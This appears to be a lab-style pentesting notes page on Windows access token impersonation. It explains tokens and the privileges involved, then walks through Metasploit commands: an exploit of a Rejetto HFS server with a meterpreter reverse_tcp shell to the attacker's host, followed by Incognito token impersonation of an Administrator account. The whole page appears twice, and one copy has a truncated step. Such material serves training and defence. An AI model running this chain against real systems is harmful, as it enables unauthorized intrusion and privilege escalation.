Access Token Impersonation

Windows Access Tokens

Windows access tokens are a core element of the authentication process on Windows and are created and managed by the Local Security Authority Subsystem Service (LSASS).
A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network resource without having to provide credentials each time a process is started or a system resource is accessed.
Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of the same access token.
Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.
An access token will typically be assigned one of the following security levels:
- Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons.
- Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as RDP.
Impersonate-level tokens can be used to impersonate a token on the local system and not on any external systems that utilize the token.
Delegate-level tokens pose the largest threat as they can be used to impersonate tokens on any system.

Windows Privileges

The process of impersonating access tokens to elevate privileges on a system will primarily depend on the privileges assigned to the account that has been exploited to gain initial access as well as the impersonation or delegation tokens available..
The following are the privileges that are required for a successful impersonation attack:
- SeAssignPrimaryToken: This allows a user to impersonate tokens.
- SeCreateToken: This allows a user to create an arbitrary token with administrative privileges.
- SeImpersonatePrivilege: This allows a user to create a process under the securitycontext of another user typically with administrative privileges.

The Incognito Meterpreter Module

Incognito Meterpreter Module is a built-in tool in Metasploit that was originally developed as a standalone application for token impersonation after a successful exploit.
The Incognito module allows you to display a list of available user tokens that can be impersonated.
It enables token impersonation, allowing you to assume different user identities and access elevated privileges on the compromised system.
This module enhances post-exploitation capabilities, enabling deeper system access and facilitating the assessment of security risks by adopting various user tokens.

Attack Flow for the Access Token Impersonation Attack

1. Exploit Vulnerability

Target: HTTP Rejetto web server
Vulnerability: Remote Code Execution (RCE)
Tool: Metasploit Framework
Module: exploit/windows/http/rejetto_hfs_exec
Action: Use the msfconsole to launch the exploit and gain basic access to the server.

Command:

use exploit/windows/http/rejetto_hfs_exec
set RHOSTS [Target IP]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [Your IP]
exploit

2. Check System Information

Action: Once you have a Meterpreter session, run the sysinfo command to gather system details.
Command:
```
sysinfo
```
Observation: Confirm the system is 32-bit (x86) based on the output.

Issue: You may encounter “Access is denied” if trying to migrate to a 64-bit shell because the current session is 32-bit.
Solution: Use the incognito module to bypass this restriction instead.

4. Check Privileges

Action: Execute the getuid command to check the current user.
Command:
```
getuid
```
Output: Shows "LOCAL SERVICE" as the current user.
Next Step: Run getprivs to list available privileges.
Command:
```
getprivs
```

5. Leverage Privileges for Token Impersonation

Privilege: SeImpersonatePrivilege is available, allowing token impersonation.
Action: Load the incognito module to use this privilege.
Command:
```
load incognito
```

6. List Available Tokens

Action: Display user tokens to find a higher privilege token.
Command:
```
list_tokens -u
```

7. Impersonate a Higher Privilege User

Action: Use the impersonate_token command to assume the identity of a higher privilege user.

Command:

impersonate_token "ATTACKDEFENSE\Administrator"

8. Migrate to a 64-bit Shell

Action: After impersonation, migrate to a 64-bit (x64) shell.
Command:
```
migrate [x64 Process ID]
```

Hacker's Mantra:Computer hackers do not need to know each other’s real names, or even live on the same continent, to steal millions in mere hours. - Robert Mueller

PreviousBypassing UAC With UACMe NextWindows File System Vulnerability - Alternate Data Streams

Last updated 10 months ago

Was this helpful?

Access Token Impersonation

Windows Access Tokens

Windows access tokens are a core element of the authentication process on Windows and are created and managed by the Local Security Authority Subsystem Service (LSASS).
A Windows access token is responsible for identifying and describing the security context of a process or thread running on a system. Simply put, an access token can be thought of as a temporary key akin to a web cookie that provides users with access to a system or network resource without having to provide credentials each time a process is started or a system resource is accessed.
Access tokens are generated by the winlogon.exe process every time a user authenticates successfully and includes the identity and privileges of the user account associated with the thread or process. This token is then attached to the userinit.exe process, after which all child processes started by a user will inherit a copy of the access token from their creator and will run under the privileges of the same access token.
Windows access tokens are categorized based on the varying security levels assigned to them. These security levels are used to determine the privileges that are assigned to a specific token.
An access token will typically be assigned one of the following security levels:
- Impersonate-level tokens are created as a direct result of a non-interactive login on Windows, typically through specific system services or domain logons.
- Delegate-level tokens are typically created through an interactive login on Windows, primarily through a traditional login or through remote access protocols such as RDP.
Impersonate-level tokens can be used to impersonate a token on the local system and not on any external systems that utilize the token.
Delegate-level tokens pose the largest threat as they can be used to impersonate tokens on any system.

Windows Privileges

The process of impersonating access tokens to elevate privileges on a system will primarily depend on the privileges assigned to the account that has been exploited to gain initial access as well as the impersonation or delegation tokens available..
The following are the privileges that are required for a successful impersonation attack:
- SeAssignPrimaryToken: This allows a user to impersonate tokens.
- SeCreateToken: This allows a user to create an arbitrary token with administrative privileges.
- SeImpersonatePrivilege: This allows a user to create a process under the securitycontext of another user typically with administrative privileges.

The Incognito Meterpreter Module

Incognito Meterpreter Module is a built-in tool in Metasploit that was originally developed as a standalone application for token impersonation after a successful exploit.
The Incognito module allows you to display a list of available user tokens that can be impersonated.
It enables token impersonation, allowing you to assume different user identities and access elevated privileges on the compromised system.
This module enhances post-exploitation capabilities, enabling deeper system access and facilitating the assessment of security risks by adopting various user tokens.

Attack Flow for the Access Token Impersonation Attack

1. Exploit Vulnerability

Target: HTTP Rejetto web server
Vulnerability: Remote Code Execution (RCE)
Tool: Metasploit Framework
Module: exploit/windows/http/rejetto_hfs_exec
Action: Use the msfconsole to launch the exploit and gain basic access to the server.

Command:

use exploit/windows/http/rejetto_hfs_exec
set RHOSTS [Target IP]
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [Your IP]
exploit

2. Check System Information

Action: Once you have a Meterpreter session, run the sysinfo command to gather system details.
Command:
```
sysinfo
```
Observation: Confirm the system is 32-bit (x86) based on the output.

3. Attempt to

Issue: You may encounter “Access is denied” if trying to migrate to a 64-bit shell because the current session is 32-bit.
Solution: Use the incognito module to bypass this restriction instead.

4. Check Privileges

Action: Execute the getuid command to check the current user.
Command:
```
getuid
```
Output: Shows "LOCAL SERVICE" as the current user.
Next Step: Run getprivs to list available privileges.
Command:
```
getprivs
```

5. Leverage Privileges for Token Impersonation

Privilege: SeImpersonatePrivilege is available, allowing token impersonation.
Action: Load the incognito module to use this privilege.
Command:
```
load incognito
```

6. List Available Tokens

Action: Display user tokens to find a higher privilege token.
Command:
```
list_tokens -u
```

7. Impersonate a Higher Privilege User

Action: Use the impersonate_token command to assume the identity of a higher privilege user.

Command:

impersonate_token "ATTACKDEFENSE\Administrator"

8. Migrate to a 64-bit Shell

Action: After impersonation, migrate to a 64-bit (x64) shell.
Command:
```
migrate [x64 Process ID]
```

Hacker's Mantra:Computer hackers do not need to know each other’s real names, or even live on the same continent, to steal millions in mere hours. - Robert Mueller

PreviousBypassing UAC With UACMe NextWindows File System Vulnerability - Alternate Data Streams

Last updated 10 months ago

Was this helpful?